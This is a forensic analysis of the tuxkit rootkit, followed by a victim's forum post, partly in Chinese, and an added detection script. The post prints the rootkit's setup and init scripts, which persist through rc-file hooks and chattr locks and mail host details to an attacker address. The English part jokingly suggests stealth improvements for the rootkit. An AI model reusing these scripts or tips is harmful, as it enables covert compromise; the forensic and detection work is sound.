.addr, .cron, .file, .log and .proc. The filenames are self-explanatory. These
files follow the convention of the original Linux rootkit. In forensic, what
you will be interested in most is the .addr files, because it contains the
IP that netstat is supposed to hide.
--] Detecting tuxkit
Detecting tuxkit is fairly simple.
1. Look for the existence of /dev/tux
2. Run lsof -i +M | grep xsf
Hey, why wasn't lsof trojaned? t0rn has a trojaned lsof
--] Detecting tuxkit - trojans
1. md5sums - if you've keep an md5sum of the virgin state of your
installation, detecting trojans should be a walk in the park. Every
system administrator should use file integrity checker to monitor
critical file change.
2. Look for /usr/bin/xsf and /usr/bin/xchk
3. Look for extra lines in /etc/rc.sysinit
4. cd /etc/ssh; ls -l. The trojaned ls will return nothing, when in
fact your ssh config files are still there.
The following are the size difference between tuxkit and Redhat 7.1 binaries.
(before installation)
files tuxkit Redhat 7.1
------------------------------------------
crontab 29052 21280
df 27112 26812
dir 42952 45948
dmesg 3640 4252
du 25592 25788
find 55220 47516
ifconfig 36356 51164
killall 14400 12096
locate 9144 25020 (symlink to slocate)
login 3980 17740
ls 42952 45948
netstat 58228 83132
ps 62748 63180
pstree 14532 12284
sshcheck 89828 - (my test machine don't have this)
sshdconfig 451260 - (my test machine don't have this)
syslogd 28324 26972
tcpd 18660 24844
top 37844 34924
updatedb 4394 25020 (symlink to slocate)
vdir 42952 45948
This result is quite interesting. Trojans are not supposed to be bigger that
the original binaries!
--] Detecting tuxkit - if you are lucky
On our honeypot, the trojaned 'ps' still shows xsf, even though xsf was in
the list of processes to be hidden. However, 'ls' seems to work very well
in hiding files.
--] Recommendations
For tuxkit developers
- Add trojaned lsof. Borrow one from t0rn Also, fix ps.
- tools.tgz is probably not needed. A skripkid who is able to crack a Linux
machine (duh) should be able to download and compile his/her own tools.
Furthermore, tools.tgz adds unnecessary extra bytes to the tuxkit - not
really convenient for downloading.
- Add a self-deleting script, i.e. delete the tar files and installation
directory after installation. skripkids seems incapable of doing this.
The config files should be kept somewhere else other than /dev/tux.
For skripkidz - vi tuxkit, type the following:
:%s///dev//tux/installation_dir_of_your_choice/g
where installation_dir_of_your_choice is, uh, the installation directory
of your choice. (However, this won't work, since /dev/tux/.{addr,proc}, etc
are already hardcoded to the binaries - so hehe, just run ./tuxkit and pray
that the stupid system administrators won't notice
For system administrators - run file integrity checker after each fresh
install.
--] Conclusion
The world of forensic analysis ain't fun without rootkits.
--] Appendix - Contents of each packages
[root@angel tuxkit-1.0]# less bin.tgz
-rwx------ root/root 29052 2001-12-26 21:37:57 bin/crontab
-rwx------ root/root 27112 2001-12-26 21:37:57 bin/df
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/dir
-rwx------ root/root 3640 2001-12-26 21:37:57 bin/dmesg
-rwx------ root/root 25592 2001-12-26 21:37:57 bin/du
-rwx------ root/root 55220 2001-12-26 21:37:57 bin/find
-rwx------ root/root 36356 2001-12-26 21:37:57 bin/ifconfig
-rwx------ root/root 14400 2001-12-26 21:37:57 bin/killall
-rwx------ root/root 9144 2001-12-26 21:37:57 bin/locate
-rwx------ root/root 3980 2001-12-26 21:37:57 bin/login
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/ls
-rwx------ root/root 58228 2001-12-26 21:37:57 bin/netstat
-rwx------ root/root 62748 2001-12-26 21:37:57 bin/ps
-rwx------ root/root 14532 2001-12-26 21:37:57 bin/pstree
-rwx------ root/root 89828 2001-12-26 21:37:57 bin/sshcheck
-rwx------ root/root 451260 2001-12-26 21:37:57 bin/sshdconfig
-rwx------ root/root 28324 2001-12-26 21:37:57 bin/syslogd
-rwx------ root/root 1522 2001-12-26 21:37:57 bin/sz
-rwx------ root/root 18660 2001-12-26 21:37:57 bin/tcpd
-rwx------ root/root 37844 2001-12-26 21:37:57 bin/top
-rwx------ root/root 4394 2001-12-26 21:37:57 bin/updatedb
-rwx------ root/root 42952 2001-12-26 21:37:57 bin/vdir
[root@angel tuxkit-1.0]# less cfg.tgz
-rw------- root/root 17 2001-11-11 19:12:19 cfg/.addr
-rw------- root/root 69 2001-11-12 23:06:32 cfg/.cron
-rw------- root/root 67 2001-12-27 20:54:23 cfg/.file
-rw------- root/root 13 2001-12-27 20:54:47 cfg/.log
-rw------- root/root 116 2001-12-27 20:55:29 cfg/.proc
[root@angel tuxkit-1.0]# less sshd.tgz
-rw------- virus/virus 828 2001-12-13 00:22:12 ssh2/hostkey
-rw------- virus/virus 697 2001-12-13 00:22:12 ssh2/hostkey.pub
-rw------- virus/virus 503 2001-12-27 20:43:12 ssh2/logo
-rw------- virus/virus 512 2001-12-13 23:51:33 ssh2/random_seed
-rwx------ virus/virus 1040220 2002-01-06 00:05:58 ssh2/sshd
-rw------- virus/virus 647 2001-12-27 22:42:20 ssh2/sshd2_config
[root@angel tuxkit-1.0]# less lib.tgz
lrwxrwxrwx root/root 0 2001-11-11 02:49:02 lib/libproc.so -> libproc.so.
2.0.7
################end###################
tuxkit在我的机器上生成了/dev/tux目录。其中有.addr、 .cron、 .file、 .log、.proc5个隐藏文件有关于tuxkit的配置信息
它在我的机器上生成了/usr/sbin目录。其中有tux、tux2w3c、tuxstat三个文件
它还在/lib下面生成tools、ssh2、bin三个目录,放置它用到的工具
在/lib下生成init、iplook、sk、setup四个文件。大家来看看:
setup的内容:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com" 就是这个家伙吧?!!!!
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "Installing the muie !"
chattr -saui /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
rm -rf /etc/rc.d/init.d/init /usr/bin/nfs /dev/ntfs
cp sk /usr/bin/nfs
cp sk /dev/ntfs
cp init /etc/rc.d/init.d/
chattr +saui /usr/bin/nfs /dev/ntfs /etc/rc.d/init.d/init
/etc/rc.d/init.d/init
chattr -saui /etc/rc.d/rc
chattr -saui /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
echo "# init script" >>/etc/rc.d/rc
echo "# init script" >>/etc/rc.d/rc.local
echo "# init script" >>/etc/rc.d/rc.sysinit
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.local
echo " /etc/rc.d/init.d/init" >>/etc/rc.d/rc.sysinit
chattr +saui /etc/rc.d/rc /etc/rc.d/rc.local /etc/rc.d/rc.sysinit
#echo -e " $MYIP # `hostname -f`" | mail -s skrootkit $EMAIL
echo "Done"
cp iplook /usr/bin
chattr +saui /usr/bin/iplook
iplook
echo "----------------------------------------------"
echo -e "System information"
echo -e " Hostname : `hostname -f`"
echo -e " IP address : $MYIP `hostname -i`"
echo -e " Alt IPs : `/sbin/ifconfig | grep eth | wc -l`"
echo -e " Bogomips : `cat /proc/cpuinfo | grep bogomips | awk '{printf $3}'`"
if [ -f /etc/*release ]; then
echo -e " Distribution : `head -1 /etc/*release`"
fi
echo -e " Uptime : `uptime`"
rm -rf skrootkit.tgz
sk
init
iplook
rm -rf setup
Contents of iplook:
#!/bin/bash
#
#########################################################################
# -- Echipa 1337 -- #
# #
# Coder: agressor (Echipa 1337). #
# E-Mail: agressor@1337.ro #
# This script will show the IP (LAN and possibly Internet) #
# The script can be very useful, #
# especially for those who are allocated dynamic IPs. #
# #
#########################################################################
#
/sbin/ifconfig | grep "inet addr" | grep -v "127.0.0.1" | \
awk '{print $2;}' | awk -F':' '{print $2;}'
Contents of init:
#!/bin/sh
#!/bin/bash
EMAIL="pradamea@yahoo.com"
MYIP=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
if [ -x /usr/bin/nfs ]
then
chattr +saui /usr/bin/nfs
else
cp /dev/ntfs /usr/bin/nfs
chattr +saui /usr/bin/nfs /dev/ntfs
fi
nfs &
nfs i `/sbin/pidof nfs`
echo -e " $MYIP # `hostname -f`" | mail -s reboot $EMAIL
Unlike what was described above, it did not modify my /etc/rc.d/rc.sysinit; instead it changed my /etc/rc.d/rc.local directly into this:
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
#/usr/bin/init
# Running Xsf ...
/usr/bin/xsf -q 1>/dev/null 2>/dev/null
# Running Xchk ...
/usr/bin/xchk 1>/dev/null 2>/dev/null
But I did not find the two files xsf and xchk.
tuxkit sets up an ssh backdoor after the intrusion. But I still have not figured out how it got installed on my machine. Was it through a wuftp or an openssh vulnerability?
I have already upgraded the machine from 2.4.10 to 2.4.18. Now there seem to be no suspicious processes:
ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Sep19 ? 00:00:06 init
root 2 1 0 Sep19 ? 00:00:00 [migration_CPU0]
root 3 1 0 Sep19 ? 00:00:00 [migration_CPU1]
root 4 1 0 Sep19 ? 00:00:00 [migration_CPU2]
root 5 1 0 Sep19 ? 00:00:00 [migration_CPU3]
root 6 1 0 Sep19 ? 00:00:00 [keventd]
root 7 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU0]
root 8 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU1]
root 9 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU2]
root 10 1 0 Sep19 ? 00:00:00 [ksoftirqd_CPU3]
root 11 1 0 Sep19 ? 00:00:07 [kswapd]
root 12 1 0 Sep19 ? 00:00:09 [bdflush]
root 13 1 0 Sep19 ? 00:00:01 [kupdated]
root 14 1 0 Sep19 ? 00:00:00 [mdrecoveryd]
root 20 1 0 Sep19 ? 00:00:00 [aacraid]
root 21 1 0 Sep19 ? 00:00:00 [scsi_eh_0]
root 26 1 0 Sep19 ? 00:00:01 [kjournald]
root 77 1 0 Sep19 ? 00:00:00 [khubd]
root 151 1 0 Sep19 ? 00:00:00 [kjournald]
root 152 1 0 Sep19 ? 00:00:00 [kjournald]
root 153 1 0 Sep19 ? 00:00:00 [kjournald]
root 154 1 0 Sep19 ? 00:00:02 [kjournald]
root 155 1 0 Sep19 ? 00:00:07 [kjournald]
rpc 643 1 0 Sep19 ? 00:00:00 portmap
rpcuser 662 1 0 Sep19 ? 00:00:00 rpc.statd
root 751 1 0 Sep19 ? 00:00:01 /usr/sbin/sshd
root 785 1 0 Sep19 ? 00:00:00 rpc.rquotad
root 789 1 0 Sep19 ? 00:00:00 [nfsd]
root 790 1 0 Sep19 ? 00:00:00 [nfsd]
root 791 1 0 Sep19 ? 00:00:00 [nfsd]
root 792 1 0 Sep19 ? 00:00:00 [nfsd]
root 793 1 0 Sep19 ? 00:00:00 [nfsd]
root 794 1 0 Sep19 ? 00:00:00 [nfsd]
root 795 1 0 Sep19 ? 00:00:00 [nfsd]
root 796 1 0 Sep19 ? 00:00:00 [nfsd]
root 797 1 0 Sep19 ? 00:00:00 [lockd]
root 798 797 0 Sep19 ? 00:00:00 [rpciod]
root 804 1 0 Sep19 ? 00:00:00 rpc.mountd
root 813 1 0 Sep19 ? 00:00:00 gpm -t ps/2 -m /dev/mouse
bin 823 1 0 Sep19 ? 00:00:00 cannaserver -syslog -u bin
root 832 1 0 Sep19 ? 00:00:00 crond
xfs 891 1 0 Sep19 ? 00:00:00 xfs -droppriv -daemon
daemon 909 1 0 Sep19 ? 00:00:00 /usr/sbin/atd
oracle 983 1 0 Sep19 ? 00:00:20 ora_pmon_rnet
oracle 985 1 0 Sep19 ? 00:00:07 ora_dbw0_rnet
oracle 987 1 0 Sep19 ? 00:00:18 ora_lgwr_rnet
oracle 989 1 0 Sep19 ? 00:00:30 ora_ckpt_rnet
oracle 991 1 0 Sep19 ? 00:00:01 ora_smon_rnet
oracle 993 1 0 Sep19 ? 00:00:00 ora_reco_rnet
oracle 995 1 0 Sep19 ? 00:00:00 ora_arc0_rnet
oracle 1034 1 0 Sep19 ? 00:00:04 /usr/oracle/product/8.17/bin/tns
root 1053 1 0 Sep19 ? 00:00:01 /usr/NetVault6/bin/nvpmgr
root 1054 1053 0 Sep19 ? 00:00:00 nvcmgr 2
root 1058 1 0 Sep19 tty2 00:00:00 /sbin/mingetty tty2
root 1059 1 0 Sep19 tty3 00:00:00 /sbin/mingetty tty3
root 1060 1 0 Sep19 tty4 00:00:00 /sbin/mingetty tty4
root 1061 1 0 Sep19 tty5 00:00:00 /sbin/mingetty tty5
root 1062 1 0 Sep19 tty6 00:00:00 /sbin/mingetty tty6
root 1065 1053 0 Sep19 ? 00:00:03 nvnmgr 3
root 1315 1 0 Sep19 tty1 00:00:00 /sbin/mingetty tty1
root 30764 1 0 Sep22 ? 00:00:00 xinetd -stayalive -reuse -pidfil
root 4993 751 0 12:00 ? 00:00:00 /usr/sbin/sshd
root 4995 4993 0 12:00 pts/0 00:00:00 -bash
root 5145 1 0 12:10 ? 00:00:00 syslogd -m 0
root 5149 1 0 12:10 ? 00:00:00 klogd -x
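The setup and init scripts above drop sk under /usr/bin/nfs and /dev/ntfs, drop /etc/rc.d/init.d/init, append "# init script" and a call to that file to the rc files, and lock everything with chattr +saui. The following is an added example, not part of the original analysis or of tuxkit: a read-only shell check for exactly those artifacts. The paths are taken from the scripts and the post above; the root prefix argument and the lsattr-line helper are assumptions so the check can be run against a mounted image or a constructed test tree.

```shell
#!/bin/sh
# Added example, not from the original analysis or from tuxkit: a read-only
# check for the file drops and rc hooks that the setup/init scripts above
# create. Paths come from those scripts and the post; the root prefix is an
# assumption so the check can target a mounted image ("" = the live root).
# Files and directories the setup script drops or the post reports finding.
TUXKIT_PATHS="/dev/tux /dev/ntfs /usr/bin/nfs /usr/bin/iplook
/etc/rc.d/init.d/init /lib/ssh2 /lib/tools /lib/bin
/usr/sbin/tux /usr/sbin/tux2w3c /usr/sbin/tuxstat"

# Print every listed path that exists under the prefix; return 1 if any did.
tuxkit_check_paths() {
    root=${1:-} found=0
    for p in $TUXKIT_PATHS; do
        [ -e "$root$p" ] && { echo "present: $root$p"; found=1; }
    done
    return $found
}

# Count the lines the setup script appends to an rc file: the "# init script"
# marker and the call to /etc/rc.d/init.d/init. Prints 0 for a missing file.
tuxkit_rc_hooks() {
    [ -r "$1" ] || { echo 0; return 0; }
    grep -c -e '^# init script$' -e '/etc/rc.d/init.d/init' "$1" || true
}

# Given one line of lsattr output (e.g. "----ia-------- /usr/bin/nfs"), return
# 0 if the immutable (i) or append-only (a) flag is set: chattr +saui leaves
# these behind, and they are why a plain rm fails until chattr -ia is run.
tuxkit_flags_locked() {
    case "${1%% *}" in
        *i*|*a*) return 0 ;;
        *)       return 1 ;;
    esac
}

# Run both checks against a prefix; return 1 if anything was found.
tuxkit_scan() {
    root=${1:-} rc=0
    tuxkit_check_paths "$root" || rc=1
    for f in /etc/rc.d/rc /etc/rc.d/rc.local /etc/rc.d/rc.sysinit; do
        n=$(tuxkit_rc_hooks "$root$f")
        [ "$n" -eq 0 ] || { echo "hooked: $root$f ($n lines)"; rc=1; }
    done
    return $rc
}

# Scan only when TUXKIT_ROOT is set, e.g. TUXKIT_ROOT=/mnt/image sh check.sh
[ -z "${TUXKIT_ROOT+set}" ] || tuxkit_scan "$TUXKIT_ROOT"
```

Run it with TUXKIT_ROOT pointing at a mounted copy of the suspect disk rather than on the live system, since the trojaned ls/ps binaries in bin.tgz cannot be trusted there; a non-zero exit means something was found.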